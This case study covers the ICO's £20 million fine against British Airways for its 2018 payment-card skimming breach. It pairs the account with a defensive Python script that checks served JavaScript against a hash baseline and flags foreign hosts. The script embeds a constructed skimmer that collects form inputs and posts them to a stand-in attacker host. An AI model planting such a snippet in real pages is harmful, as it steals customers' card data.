British Airways — GDPR Data Breach Fine (£20M)
In October 2020 the ICO fined British Airways £20 million for a 2018 data breach affecting around 400,000 customers and staff. Attackers harvested login credentials, payment card details (including CVV numbers) and personal information. The ICO found that British Airways had inadequate security arrangements, including weak authentication on remote access (no multi-factor authentication), poor patch management, and insufficient monitoring to detect the intrusion. The fine originally proposed in the July 2019 notice of intent was £183.39 million; it was reduced after British Airways' representations and in light of the economic impact of COVID-19.
What Went Wrong
The attacker first gained access to the British Airways network using the credentials of an employee of a third-party supplier, through a remote access gateway that did not require multi-factor authentication, then moved laterally until they could edit files served by the public website. They injected a payment-card skimmer into a JavaScript library hosted on British Airways' own website, which captured card details as customers submitted booking payments; the mobile app loaded the same web content, so its users were affected too. Around 400,000 customer records were harvested. The skimmer ran undetected from 22 June to 5 September 2018. British Airways did not detect the breach themselves: they were notified by a third party (a security researcher).
Lessons Learned
Web application monitoring and file integrity monitoring are essential. Payment card harvesting (Magecart-style skimming) is detectable with proper monitoring: the skimmer changed the hash of a served script and sent form data to a host that was not British Airways'. Supplier and subprocessor security must be reviewed, because the entry point was a third-party supplier's remote access account; and because the skimmer was planted in a library hosted on the site itself, reviewing only externally hosted third-party scripts would not have found it.
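As an added illustration of the file integrity monitoring point above (example code written for this page, not tooling from British Airways or the ICO), the script below hashes every JavaScript asset a site serves against a committed baseline manifest, then scans any modified or newly appeared script for URLs pointing at hosts outside a first-party allowlist. The site hostnames, file names and script contents, including the skimmer snippet, are all constructed for the example.

```python
import hashlib
import re
from typing import Dict, List, Set
from urllib.parse import urlsplit

# Assumed first-party hosts that a legitimate script may contact (constructed).
FIRST_PARTY_HOSTS = {"www.example-airline.test", "api.example-airline.test"}

# Constructed sample assets standing in for scripts served from the booking pages.
KNOWN_GOOD: Dict[str, bytes] = {
    "js/modernizr.min.js": b"window.Modernizr={touch:!!('ontouchstart' in window)};",
    "js/booking.js": b"document.querySelector('#pay').addEventListener('submit', submitToApi);",
}

# Constructed skimmer: serialises every form input on submit and posts it to an attacker host.
SKIMMER = (
    b"window.onload=function(){document.getElementById('submitButton').onclick=function(){"
    b"var d={};document.querySelectorAll('input').forEach(function(i){d[i.name]=i.value});"
    b"fetch('https://collect.skimmer.test/gateway/app/',{method:'POST',body:JSON.stringify(d)})}}"
)

# What the web server is serving after the compromise: one library tampered with, one unknown file.
TAMPERED: Dict[str, bytes] = {
    "js/modernizr.min.js": KNOWN_GOOD["js/modernizr.min.js"] + b"\n" + SKIMMER,
    "js/booking.js": KNOWN_GOOD["js/booking.js"],
    "js/helper.js": b"var x=1;",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(assets: Dict[str, bytes]) -> Dict[str, str]:
    """Baseline hash of every served script; generate at release time and store it off the web tier."""
    return {path: sha256_hex(body) for path, body in assets.items()}


def check_integrity(manifest: Dict[str, str], current: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Compare what is being served now against the baseline manifest."""
    findings: Dict[str, List[str]] = {"modified": [], "added": [], "missing": []}
    for path, expected in manifest.items():
        if path not in current:
            findings["missing"].append(path)
        elif sha256_hex(current[path]) != expected:
            findings["modified"].append(path)
    for path in current:
        if path not in manifest:
            findings["added"].append(path)
    for key in findings:
        findings[key].sort()
    return findings


# Absolute http(s) URLs embedded in script text; the hostname is what we care about.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"()]*)?")


def foreign_origins(script: bytes, allowed_hosts: Set[str]) -> Set[str]:
    """Hosts the script references that are not first-party: a skimmer needs somewhere to send cards."""
    hosts: Set[str] = set()
    for match in URL_RE.finditer(script):
        host = urlsplit(match.group(0).decode("ascii", "replace")).hostname
        if host and host not in allowed_hosts:
            hosts.add(host)
    return hosts


def audit(manifest: Dict[str, str], current: Dict[str, bytes], allowed_hosts: Set[str]) -> Dict[str, List[str]]:
    """Integrity findings plus any non-first-party hosts referenced by changed or new scripts."""
    report = check_integrity(manifest, current)
    report["exfil_hosts"] = sorted(
        host
        for path in report["modified"] + report["added"]
        for host in foreign_origins(current[path], allowed_hosts)
    )
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(audit(build_manifest(KNOWN_GOOD), TAMPERED, FIRST_PARTY_HOSTS), indent=2))
```

Run on a schedule against the live document root (or against what a headless browser actually receives, which also catches tampering at a CDN or load balancer), and alert on any non-empty `modified`, `added` or `exfil_hosts` list; a change to a minified library that nobody deployed is the signal that was missing for ten weeks in this case.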
Source:
Official Enforcement Record ↗